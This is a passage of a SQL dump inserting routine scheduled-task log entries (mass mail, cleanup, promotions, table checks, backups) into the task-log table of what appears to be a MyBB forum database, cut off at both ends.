`mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10069', '9', '1350195964', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10070', '3', '1350196423', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10071', '9', '1350196962', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10072', '5', '1350197325', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10073', '9', '1350197847', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10074', '3', '1350198459', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10075', '1', '1350198473', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10076', '7', '1350198714', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10077', '5', '1350198719', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10078', '9', '1350198727', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10079', '5', '1350199515', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10080', '9', '1350199524', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10081', '3', '1350199820', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10082', '9', '1350200463', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10083', '5', '1350200716', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10084', '9', '1350201303', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10085', '3', '1350201549', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10086', '1', '1350201624', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10087', '7', '1350201656', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10088', '5', '1350201921', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10089', '9', '1350202240', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10090', '5', '1350203173', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10091', '9', '1350203254', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10092', '3', '1350203417', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10093', '9', '1350204366', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10094', '5', '1350204376', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10095', '9', '1350205047', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10096', '3', '1350205390', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10097', '1', '1350205467', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10098', '7', '1350205491', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10099', '5', '1350205599', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10100', '9', '1350205839', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10101', '5', '1350206755', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10102', '9', '1350206774', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10103', '3', '1350210970', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10104', '9', '1350211069', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10105', '5', '1350211088', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10106', '1', '1350211111', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10107', '7', '1350211770', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10108', '9', '1350211856', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10109', '5', '1350212010', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10110', '9', '1350212120', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10111', '3', '1350214234', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10112', '1', '1350214239', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10113', '7', '1350214261', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10114', '5', '1350214289', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10115', '9', '1350214297', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10116', '9', '1350216757', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10117', '5', '1350216766', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10118', '3', '1350216853', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10119', '1', '1350217175', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10120', '4', '1350217185', 'The database backup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10121', '7', '1350217207', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10122', '5', '1350217517', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10123', '9', '1350218143', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10124', '3', '1350218148', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10125', '9', '1350218453', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10126', '5', '1350218786', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10127', '9', '1350219483', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10128', '3', '1350219555', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10129', '1', '1350219665', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10130', '7', '1350219671', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10131', '5', '1350220283', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10132', '9', '1350220358', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10133', '5', '1350221129', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10134', '9', '1350221168', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10135', '3', '1350221429', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10136', '9', '1350222007', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10137', '5', '1350222602', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10138', '9', '1350223211', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10139', '3', '1350223219', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10140', '1', '1350223422', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10141', '7', '1350223435', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10142', '5', '1350223588', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10143', '9', '1350224171', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10144', '5', '1350224701', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10145', '9', '1350224707', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10146', '3', '1350225022', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10147', '9', '1350226284', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10148', '5', '1350226295', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10149', '9', '1350226551', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10150', '3', '1350226776', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10151', '1', '1350226827', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10152', '7', '1350226835', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10153', '5', '1350227159', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10154', '9', '1350227989', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10155', '5', '1350228361', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10156', '9', '1350228844', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10157', '3', '1350228860', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10158', '9', '1350229321', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10159', '5', '1350229864', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10160', '9', '1350230390', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10161', '3', '1350230393', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10162', '1', '1350230424', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10163', '7', '1350230430', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10164', '5', '1350230719', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10165', '9', '1350231869', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10166', '5', '1350231916', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10167', '9', '1350231938', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10168', '3', '1350232235', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10169', '9', '1350232826', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10170', '5', '1350233280', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10171', '9', '1350234000', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10172', '3', '1350234003', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10173', '1', '1350234022', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10174', '7', '1350234026', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10175', '5', '1350234828', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10176', '9', '1350235184', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10177', '5', '1350235605', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10178', '9', '1350236179', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10179', '3', '1350236185', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10180', '9', '1350236432', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10181', '5', '1350236726', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10182', '9', '1350237924', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10183', '3', '1350237927', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10184', '1', '1350237940', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10185', '7', '1350237948', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10186', '5', '1350237949', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10187', '9', '1350238718', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10188', '5', '1350239660', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10189', '9', '1350239665', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10190', '3', '1350240272', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10191', '9', '1350240281', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10192', '5', '1350240416', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10193', '9', '1350241613', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10194', '3', '1350241971', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10195', '1', '1350242107', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10196', '7', '1350242111', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10197', '5', '1350242328', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10198', '9', '1350242333', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10199', '5', '1350242774', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10200', '9', '1350243085', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10201', '3', '1350243109', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10202', '9', '1350243969', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10203', '5', '1350243982', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10204', '9', '1350244515', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10205', '3', '1350244830', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10206', '1', '1350244948', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10207', '7', '1350244958', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10208', '5', '1350245130', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10209', '9', '1350245493', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10210', '5', '1350246302', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10211', '9', '1350246326', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10212', '3', '1350248191', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10213', '9', '1350248244', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10214', '5', '1350248366', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10215', '3', '1350248659', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10216', '1', '1350248957', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10217', '7', '1350248963', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10218', '5', '1350248980', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10219', '9', '1350249327', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10220', '5', '1350249903', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10221', '9', '1350249914', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10222', '3', '1350250211', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10223', '9', '1350250894', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10224', '5', '1350251624', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10225', '9', '1350251998', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10226', '3', '1350252021', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10227', '1', '1350252079', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10228', '7', '1350252085', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10229', '5', '1350252396', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10230', '9', '1350252615', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10231', '5', '1350253512', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10232', '9', '1350253516', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10233', '3', '1350253850', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10234', '9', '1350254424', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10235', '5', '1350254727', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10236', '9', '1350255914', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10237', '3', '1350255916', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10238', '1', '1350255918', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10239', '7', '1350255925', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10240', '5', '1350255943', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10241', '9', '1350256244', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10242', '5', '1350257579', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10243', '9', '1350258064', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10244', '3', '1350258065', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10245', '5', '1350258704', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10246', '9', '1350259006', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10247', '3', '1350259170', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10248', '1', '1350259225', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10249', '2', '1350259228', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10250', '7', '1350259234', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10251', '11', '1350259453', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10252', '5', '1350259527', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10253', '9', '1350259839', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10254', '5', '1350261318', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10255', '9', '1350261324', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10256', '3', '1350261331', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10257', '9', '1350261641', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10258', '5', '1350261997', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10259', '9', '1350262523', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10260', '3', '1350262838', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10261', '1', '1350262859', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10262', '7', '1350262863', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10263', '5', '1350263267', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10264', '9', '1350263433', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10265', '5', '1350264323', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10266', '9', '1350264361', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10267', '3', '1350264690', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10268', '9', '1350265224', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10269', '5', '1350265806', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10270', '9', '1350266540', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10271', '3', '1350266556', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10272', '1', '1350266563', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('10273', '7', '1350266567', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) 